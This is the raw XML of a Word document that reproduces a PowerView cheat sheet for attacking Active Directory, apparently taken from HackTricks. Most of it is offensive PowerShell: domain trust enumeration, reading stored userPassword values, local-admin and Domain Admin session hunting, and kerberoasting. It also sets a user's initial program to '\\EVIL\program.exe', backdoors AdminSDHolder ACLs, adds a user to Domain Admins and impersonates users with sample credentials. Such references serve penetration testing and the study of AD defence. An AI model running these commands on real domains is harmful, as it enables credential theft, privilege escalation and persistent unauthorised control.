    <w:p w14:paraId="555BDD6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Find-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InterestingDomainShareFile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#Find interesting files, can use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filters</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="45CFCC84" w14:textId="77777777" w:rsid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</w:pPr>
    </w:p>
    <w:p w14:paraId="4049CD9A" w14:textId="13552DEE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</w:pPr>
      <w:r w:rsidRPr="00B448C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  <w:lastRenderedPageBreak/>
        <w:t>Domain Trust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A8B61A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NetDomainTrust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all domain trusts (parent, children and external)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5EC77A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DomainTrust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#Same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511790D3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NetForestDomain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NetDomainTrust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#Enumerate all the trusts of all the domains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found</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="101BD203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DomainTrustMapping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#Enumerate also all the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trusts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="16546B06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F9A85EB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ForestDomain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 Get basic forest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info</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="26105FD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ForestGlobalCatalog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info of current forest (no external)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D38876D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ForestGlobalCatalog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-Forest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external.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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info about the external forest (if possible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB04AC5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DomainTrust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SearchBase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"GC://$($ENV:USERDNSDOMAIN)" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7231502A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8DD4AF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NetForestTrust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 forest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trusts (it must be between 2 roots, trust between a child and a root is just an external trust)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C922C1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EB15A7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DomainForeingUser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users with privileges in other domains inside the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forest</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="54E7B23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DomainForeignGroupMember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#Get groups with privileges in other domains inside the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forest</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57ABAF0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</w:pPr>
      <w:r w:rsidRPr="00B448C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  <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00B448C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ow</w:t>
      </w:r>
      <w:r w:rsidRPr="00B448C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  <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00B448C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hanging fruit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529FF7B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#Check if any user passwords are set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE3D4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$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FormatEnumerationLimit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=-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1;Get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-DomainUser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LDAPFilter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'(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userPassword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=*)' -Properties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samaccountname,memberof,userPassword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| % {Add-Member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InputObject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$_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NoteProperty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'Password' "$([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System.Text.Encoding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]::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ASCII.GetString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($_.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userPassword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))"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PassThru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} |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fl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17B2CAC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11A0E4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#Asks DC for all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computers, and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asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA2BFC4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Find-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LocalAdminAccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41A3935A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B58B2AC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#(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This time you need to give the list of computers in the domain) Do the same as before but trying to execute a WMI action in each computer (admin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privs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are needed to do so). Useful if RCP and SMB ports are closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB353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.\Find-WMILocalAdminAccess.ps1 -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ComputerFile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.\computers.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4884C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8AD89E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>#Enumerate machines where a particular user/group identity has local admin rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F2E0A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DomainGPOUserLocalGroupMapping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-Identity &lt;User/Group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6236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EE9043A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Enumerates the members of specified local group (default administrators)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C540ECB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for all the targeted machines on the current (or specified) domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC866F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Invoke-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EnumerateLocalAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5623478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Find-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DomainLocalGroupMember</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="227B130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695D45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#Search unconstrained delegation computers and show users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D004E4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Find-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DomainUserLocation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ComputerUnconstrained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ShowAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FC6A0A7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20DF15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#Admin users that allow delegation, logged into servers that allow unconstrained delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1A706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Find-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DomainUserLocation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ComputerUnconstrained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UserAdminCount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UserAllowDelegation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20A15F0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9C7852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#Get members from Domain Admins (default) and a list of computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264D164C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and check if any of the users is logged in any machine running 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NetSession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/Get-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NetLoggedon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on each host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765D1A4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 If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Checkaccess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then it also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check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for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LocalAdmin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access in the hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC515BD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## By </w:t>
      </w:r>
      <w:proofErr w:type="gram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default</w:t>
      </w:r>
      <w:proofErr w:type="gram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users inside Domain Admins are searched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDFE3AD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Find-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DomainUserLocation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[-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CheckAccess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] | select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SessionFromName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B2E52F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Invoke-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UserHunter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[-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CheckAccess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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31B5E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D1B6503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#Search "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RDPUsers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" users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFEE9A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Invoke-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UserHunter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GroupName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"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RDPUsers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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6455682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B8A8A5F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#It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB3A4C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Invoke-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UserHunter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-Stealth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7728630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</w:pPr>
      <w:r w:rsidRPr="00B448C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  <w:t xml:space="preserve">Deleted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B448C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  <w:t>objects</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1AB9CAB5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#This isn't a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powerview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command, it's a feature from the AD management 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powershell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module of Microsoft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A245A3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#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40566DC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ADObject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-filter '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isDeleted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-eq $true' -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>includeDeletedObjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B448C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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Properties *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBE7D41" w14:textId="33FFF55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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B7377C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pacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>MISC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D84BEA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pacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SID to Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843D2D7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"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-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SidToName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CFC53ED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pacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53FA2594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Invoke-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Kerberoast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[-Identity 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websvc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] #Without "-Identity" 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kerberoast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all possible </w:t>
      </w:r>
      <w:proofErr w:type="gram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users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E8091A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pacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Use different credentials (argument)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2440D50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# </w:t>
      </w:r>
      <w:proofErr w:type="gram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use</w:t>
      </w:r>
      <w:proofErr w:type="gram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an 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alterate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creadential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for any function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663A525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$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SecPassword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= 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ConvertTo-SecureString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'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BurgerBurgerBurger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!' -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AsPlainText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-Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66761F7C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$Cred = New-Object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System.Management.Automation.PSCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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('TESTLAB\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dfm.a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', $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SecPassword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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA2BB40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Get-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DomainUser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-Credential $</w:t>
      </w:r>
      <w:proofErr w:type="gram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Cred</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="69F672F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pacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Impersonate a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1EB0366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# </w:t>
      </w:r>
      <w:proofErr w:type="gram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if</w:t>
      </w:r>
      <w:proofErr w:type="gram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running in -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sta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mode, impersonate another credential a la "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runas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/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netonly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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69230725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$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SecPassword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= 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ConvertTo-SecureString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'Password123!' -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AsPlainText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-Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD60375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$Cred = New-Object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System.Management.Automation.PSCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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('TESTLAB\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dfm.a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', $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SecPassword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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504FAAB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Invoke-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UserImpersonation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-Credential $</w:t>
      </w:r>
      <w:proofErr w:type="gram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Cred</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B55419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# ... action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C120A8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Invoke-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RevertToSelf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55DA15EA" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448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5716F8" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448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CBE049" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448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D107AE" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448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3F534B" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448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F58051" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448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3B925D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pacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-3"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="091C92E2" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448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5BD58E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# </w:t>
      </w:r>
      <w:proofErr w:type="gram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set</w:t>
      </w:r>
      <w:proofErr w:type="gram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the specified property for the given user identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C8D71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Set-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DomainObject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testuser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-Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6AEE42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# Set the owner of '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dfm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' in the current domain to 'harmj0y'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23433B63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Set-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DomainObjectOwner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-Identity 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dfm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OwnerIdentity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</w:t>
      </w:r>
      <w:proofErr w:type="gram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harmj0y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6549FD8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# Backdoor the ACLs of all privileged accounts with the 'matt' account through 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AdminSDHolder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abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62904FED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lastRenderedPageBreak/>
        <w:t>Add-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DomainObjectAcl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TargetIdentity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'CN=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AdminSDHolder,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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=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System,DC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=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testlab,DC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=local' -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PrincipalIdentity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matt -Rights All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55572B2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# Add user to 'Domain Admins'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1FAB99" w14:textId="77777777" w:rsidR="00B448C1" w:rsidRPr="00B448C1" w:rsidRDefault="00B448C1" w:rsidP="00B448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14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr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Add-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NetGroupUser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-Username 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username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-</w:t>
      </w:r>
      <w:proofErr w:type="spell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GroupName</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> 'Domain Admins' -Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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my.domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B448C1">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40B8AF77" w14:textId="0E7DEF9B" w:rsidR="00303F12" w:rsidRDefault="00303F12" w:rsidP="00B448C1"/>
    <w:sectPr w:rsidR="0030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32BF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3392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55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12"/>
    <w:rsid w:val="00303F12"/>
    <w:rsid w:val="00B4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CD49"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3E9126E1-32D3-4DB1-961A-CAB03C5A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3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3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03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3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3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3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3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3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3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03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03F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3F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3F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3F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3F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3F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3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3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3F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3F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3F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3F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3F1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4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4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48C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448C1"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="grid">
    <w:name w:val="grid"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00B448C1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ml-3">
    <w:name w:val="ml-3"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00B448C1"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B448C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448C1"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="max-w-3xl">
    <w:name w:val="max-w-3xl"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B4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B448C1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="flex">
    <w:name w:val="flex"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00B448C1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="uppercase">
    <w:name w:val="uppercase"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00B448C1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-base">
    <w:name w:val="text-base"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00B448C1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="leading-normal">
    <w:name w:val="leading-normal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B4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xs">
    <w:name w:val="text-xs"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00B448C1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-dark">
    <w:name w:val="text-dark"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00B4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500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70669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508848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3791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730577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7116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859958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1993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735872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99264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012653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92429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111027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25028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228602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686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830532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5820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731561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5721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224814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139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750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27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8531309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87210901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91412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58627190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20476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15877756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975269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51767881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23119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41116660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819190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27316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.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abu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2405</Words>
  <Characters>13711</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>114</Lines>
  <Paragraphs>32</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>16084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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Alberto Gómez</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-14T02:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-14T03:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>